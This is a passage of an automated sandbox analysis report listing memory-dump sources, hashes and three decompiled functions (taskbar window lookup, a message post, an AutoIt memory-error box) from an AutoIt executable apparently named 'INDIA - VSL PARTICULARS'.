                              • Associated: 00000000.00000002.2190533171.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190594120.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_INDIA - VSL PARTICULARS.jbxd
                              Similarity
                              • API ID: FindMessagePostSleepWindow
                              • String ID: Shell_TrayWnd
                              • API String ID: 529655941-2988720461
                              • Opcode ID: 45e518b183cc50fc9cae19d0f51122c68363ee0c98c893ad2541c3bd761d7025
                              • Instruction ID: aba4e04af0122a293c2d26b46e7c49f9db856b5fc79b6d6ac13cebee95b63d36
                              • Opcode Fuzzy Hash: 45e518b183cc50fc9cae19d0f51122c68363ee0c98c893ad2541c3bd761d7025
                              • Instruction Fuzzy Hash: EFD0A772BC13013BFA6077745D0FF8B66145B14711F000C3A7B42E61C1D4F8E4018758
                              Function 00441C20 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 17windowCOMMON
                              Download Yara Rule
                              APIs
                              • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00441C2A
                              • PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 00441C3D
                                • Part of subcall function 004331A2: Sleep.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,004A8178), ref: 004331B9
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2190347807.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2190325185.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190405144.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190459368.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190509021.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190533171.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190533171.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190594120.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_INDIA - VSL PARTICULARS.jbxd
                              Similarity
                              • API ID: FindMessagePostSleepWindow
                              • String ID: Shell_TrayWnd
                              • API String ID: 529655941-2988720461
                              • Opcode ID: 2c92ce268d6dea70ed1d9c93ac972332f86dd545b3a9023bb22b3be85c6f7e29
                              • Instruction ID: e91d5bd0f3095d95abf168919443ed1e5ef8457e9bc9ee6dadeb2d3358a759b2
                              • Opcode Fuzzy Hash: 2c92ce268d6dea70ed1d9c93ac972332f86dd545b3a9023bb22b3be85c6f7e29
                              • Instruction Fuzzy Hash: 61D0A772B843017BFA6077745D0FF8B66145B14711F000C3A7B46A61C1D4F8D4018758
                              Function 004370C3 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 8windowCOMMON
                              Download Yara Rule
                              APIs
                              • MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 004370D1
                                • Part of subcall function 004118DA: _doexit.LIBCMT ref: 004118E6
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2190347807.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2190325185.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190405144.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190459368.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190509021.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190533171.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190533171.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190594120.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_INDIA - VSL PARTICULARS.jbxd
                              Similarity
                              • API ID: Message_doexit
                              • String ID: AutoIt$Error allocating memory.
                              • API String ID: 1993061046-4017498283
                              • Opcode ID: a805162a0f5c9c87f8277766c6d2ca4cce7c6123580b1b409358537ccd51af94
                              • Instruction ID: aa36ec6b1cc278624b5c670a1a0522bf80bf1016c56dd6686bcadf549e8ac499
                              • Opcode Fuzzy Hash: a805162a0f5c9c87f8277766c6d2ca4cce7c6123580b1b409358537ccd51af94
                              • Instruction Fuzzy Hash: F1B092323C030627E50437910D0BF9D26003B64F02F220C067324280D204C90090131D